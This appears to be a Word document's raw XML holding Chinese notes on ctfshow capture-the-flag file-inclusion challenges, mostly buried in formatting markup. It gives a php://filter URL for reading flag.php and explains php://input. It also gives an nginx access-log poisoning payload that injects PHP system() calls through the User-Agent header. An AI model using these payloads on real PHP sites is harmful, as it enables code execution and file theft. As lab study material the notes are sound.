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ctfshow文件包含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Web-78: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http://6353b67d-da0e-4c8b-b809-f38701febab0.challenge.ctf.show:8080/?file=php://filter/convert.base64-encode/resource=flag.php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Web-79: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5420" cy="1739265"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="1" name="图片 1" descr="微信截图_20210926150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2109261504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EEEEEE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EEEEEE"/>
        </w:rPr>
        <w:t>php://input 是个可以访问请求的原始数据的只读流。当请求方式是post，并且Content-Type不等于”multipart/form-data”时，可以使用php://input来获取原始请求的数据。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EEEEEE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EEEEEE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tip: linux cat 和 tac 区别 ！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C4C4C8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="262728"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C4C4C8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="262728"/>
        </w:rPr>
        <w:t>tac命令与cat命令展示内容相反，用于将文件以行为单位的反序输出，即第一行最后显示，最后一行先显示，且不能带行输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C4C4C8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="262728"/>
        </w:rPr>
      </w:pP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EEEEEE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>W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EEEEEE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eb81</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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EEEEEE"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/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payload：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7FF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7FF"/>
        </w:rPr>
        <w:t>?file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7FF"/>
        </w:rPr>
        <w:t>=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7FF"/>
        </w:rPr>
        <w:t>/var/log/nginx/access.log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7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7FF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7FF"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: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7FF"/>
        </w:rPr>
        <w:t>&lt;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7FF"/>
        </w:rPr>
        <w:t>?php system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7FF"/>
        </w:rPr>
        <w:t>('ls');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7FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?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7FF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7FF"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: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7FF"/>
        </w:rPr>
        <w:t>&lt;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7FF"/>
        </w:rPr>
        <w:t>?php system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7FF"/>
        </w:rPr>
        <w:t>('cat fl0g.php');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7FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?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7FF"/>
        </w:rPr>
        <w:t>&gt;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C4C4C8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="2627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A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D1688"/>
    <w:rsid w:val="03A3166A"/>
    <w:rsid w:val="0C352EFF"/>
    <w:rsid w:val="0C951CAF"/>
    <w:rsid w:val="0D2E0D7F"/>
    <w:rsid w:val="0D8E28D9"/>
    <w:rsid w:val="10BE3CB5"/>
    <w:rsid w:val="142A7758"/>
    <w:rsid w:val="15226A6A"/>
    <w:rsid w:val="15A22EB6"/>
    <w:rsid w:val="16137701"/>
    <w:rsid w:val="181A0EFD"/>
    <w:rsid w:val="195E667B"/>
    <w:rsid w:val="19EA1484"/>
    <w:rsid w:val="1AE36CE9"/>
    <w:rsid w:val="1AF81782"/>
    <w:rsid w:val="1CE812E3"/>
    <w:rsid w:val="1FE30A3F"/>
    <w:rsid w:val="20B87E4F"/>
    <w:rsid w:val="21357EB0"/>
    <w:rsid w:val="23566076"/>
    <w:rsid w:val="2C801F51"/>
    <w:rsid w:val="2FE54D81"/>
    <w:rsid w:val="3064185E"/>
    <w:rsid w:val="30D73BA2"/>
    <w:rsid w:val="311B058C"/>
    <w:rsid w:val="335A5472"/>
    <w:rsid w:val="343C3E1C"/>
    <w:rsid w:val="345E21E9"/>
    <w:rsid w:val="346F1E7D"/>
    <w:rsid w:val="34C5457D"/>
    <w:rsid w:val="36D142AE"/>
    <w:rsid w:val="39845795"/>
    <w:rsid w:val="3BAB0038"/>
    <w:rsid w:val="3F1B1479"/>
    <w:rsid w:val="3FE51830"/>
    <w:rsid w:val="4899566D"/>
    <w:rsid w:val="4EDE5275"/>
    <w:rsid w:val="51472979"/>
    <w:rsid w:val="52804EE0"/>
    <w:rsid w:val="579D007F"/>
    <w:rsid w:val="591D4E01"/>
    <w:rsid w:val="5A3D6DC8"/>
    <w:rsid w:val="5CE00959"/>
    <w:rsid w:val="60A76C3F"/>
    <w:rsid w:val="60D17767"/>
    <w:rsid w:val="6114242E"/>
    <w:rsid w:val="62985179"/>
    <w:rsid w:val="65C60913"/>
    <w:rsid w:val="67CE3827"/>
    <w:rsid w:val="69271616"/>
    <w:rsid w:val="6EDE2E8E"/>
    <w:rsid w:val="6EF40FCD"/>
    <w:rsid w:val="70515910"/>
    <w:rsid w:val="76FB713B"/>
    <w:rsid w:val="771104D4"/>
    <w:rsid w:val="7AD2371E"/>
    <w:rsid w:val="7BC6011F"/>
    <w:rsid w:val="7C216E39"/>
    <w:rsid w:val="7DD5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2021-09-26T07:05:14Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>鲤鱼</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-26T08:17:10Z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E021BC82F93E4A65844069FD59673527</vt:lpwstr>
  </property>
</Properties>
</file>